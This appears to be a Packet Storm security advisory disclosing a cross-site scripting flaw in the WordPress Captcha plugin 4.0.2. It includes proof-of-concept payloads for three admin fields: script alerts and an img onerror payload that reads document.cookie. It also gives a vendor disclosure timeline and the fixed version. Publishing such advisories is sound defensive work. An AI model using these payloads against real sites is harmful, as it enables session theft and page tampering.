what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Captcha 4.0.2 Cross Site Scripting

WordPress Captcha 4.0.2 Cross Site Scripting
Posted Dec 17, 2015
Authored by Madhu Akula

WordPress Captcha plugin version 4.0.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 2f6b4bd9ef1ed9c48c079be14de955b50a23b69435ce519584538bb40c57e0a8

WordPress Captcha 4.0.2 Cross Site Scripting

Change Mirror Download
Plugin Name : Captcha

Effected Version : 4.0.2 (and most probably lower version's if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Madhu Akula



Technical Details

Minimum Level of Access Required : Administrator

PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=captcha.php

In the above page the following fields put the payload as below

cptch_label_form = “><script>alert(1)</script>

cptch_required_symbol = “><script>alert(2)</script>


http://localhost/wp-admin/admin.php?page=captcha.php&action=go_pro


bws_license_key =”><img src=x onerror=prompt(document.cookie);>

Vulnerable Parameter : cptch_label_form, cptch_required_symbol, bws_license_key

Type of XSS : Reflected / Stored

Fixed in : 4.0.3

http://wordpress.org/plugins/captcha/changelog/

Disclosure Timeline

Vendor Contacted : 2014-08-04

Plugin Status : Updated on 2014-08-07

Public Disclosure : October 3, 2015

CVE Number : Not assigned yet

Plugin Description :

The Captcha plugin allows you to implement a super security captcha form into web forms. It protects your website from spam by means of math logic, easily understood by human beings. You will not have to spend your precious time on annoying attempts to understand hard-to-read words, combinations of letters or pictures that make your eyes pop up. All you need is to do one of the three basic maths actions - add, subtract and multiply. This captcha can be used for login, registration, password recovery, comments forms. There is also a premium version of the plugin, allowing compatibility with BuddyPress (Registration form, Comments form, "Create a Group" form) and Contact Form 7.
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close